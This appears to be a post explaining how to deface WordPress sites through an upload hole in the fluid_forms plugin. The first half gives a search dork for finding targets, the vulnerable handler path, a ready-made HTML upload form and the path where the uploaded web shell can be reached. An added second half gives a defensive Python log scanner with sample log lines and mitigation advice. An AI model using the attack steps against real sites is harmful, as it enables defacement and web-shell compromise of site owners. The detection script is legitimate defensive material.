
Defacing WordPress Using the Fluid_forms Upload Vulnerability Exploit


#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress

Dork: inurl:fluid_forms or inurl:"/wp-content/plugins/fluid_forms/file-upload/" 

Exploit: /wp-content/plugins/fluid_forms/file-upload/server/php/

CSRF: save it with the .html extension.


<form method="POST" action="http://www.site.com/wp-content/plugins/fluid_forms/file-upload/server/php/" enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button><br/></form>

If the site is vulnerable, [] will be returned.

Access your shell: /wp-content/plugins/fluid_forms/file-upload/server/php/files/shellmu.php
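On the defending side, both requests in the steps above leave a recognisable trace in the web server access log. The Python script below is an added example, not part of the original post; it assumes the Apache/nginx "combined" log format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths quoted in the post: the plugin's upload handler and its files/ directory.
HANDLER = "/wp-content/plugins/fluid_forms/file-upload/server/php/"
FILES = HANDLER + "files/"
# Extensions a PHP-enabled server commonly executes (assumed list; match your config).
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Apache/nginx "combined" access-log layout (assumed).
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')

def normalise(uri):
    """Drop the query string, percent-decode, collapse repeated slashes."""
    return re.sub(r"/+", "/", unquote(uri.split("?", 1)[0]))

def scan(lines):
    """Return (kind, ip, timestamp, path, status) for each suspicious request."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not in the assumed log format
        path, status = normalise(m["uri"]), int(m["status"])
        if m["method"] == "POST" and path in (HANDLER, HANDLER + "index.php"):
            # Direct POST to the handler: a file upload attempt.
            findings.append(("upload", m["ip"], m["ts"], path, status))
        elif path.startswith(FILES) and EXEC_EXT.search(path):
            # Script requested from the upload directory; 200 means it was served.
            findings.append(("script-in-uploads", m["ip"], m["ts"], path, status))
    return findings

# Constructed sample log lines (documentation IP ranges, invented timestamps).
P = "/wp-content/plugins/fluid_forms"
SAMPLE = [
    f'203.0.113.7 - - [12/Mar/2015:10:01:02 +0000] "POST {P}/file-upload/server/php/ HTTP/1.1" 200 312 "-" "-"',
    f'203.0.113.7 - - [12/Mar/2015:10:01:40 +0000] "GET {P}/file-upload/server/php/files/shellmu.php HTTP/1.1" 200 88 "-" "-"',
    f'198.51.100.4 - - [12/Mar/2015:10:02:00 +0000] "GET {P}/file-upload/server/php/files/photo.jpg HTTP/1.1" 200 5120 "-" "-"',
    f'198.51.100.4 - - [12/Mar/2015:10:02:30 +0000] "GET {P}/file-upload/server/php/ HTTP/1.1" 200 2 "-" "-"',
    f'192.0.2.9 - - [12/Mar/2015:10:03:00 +0000] "GET {P}//file-upload/server/php/files/a%2EPHP HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="\t")
```

A `script-in-uploads` hit with status 200 means a script in the upload directory was actually served, so the contents of `files/` should be reviewed. Removing the plugin's upload handler or disabling script execution in that directory closes the path the post relies on.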


Hope this is useful.
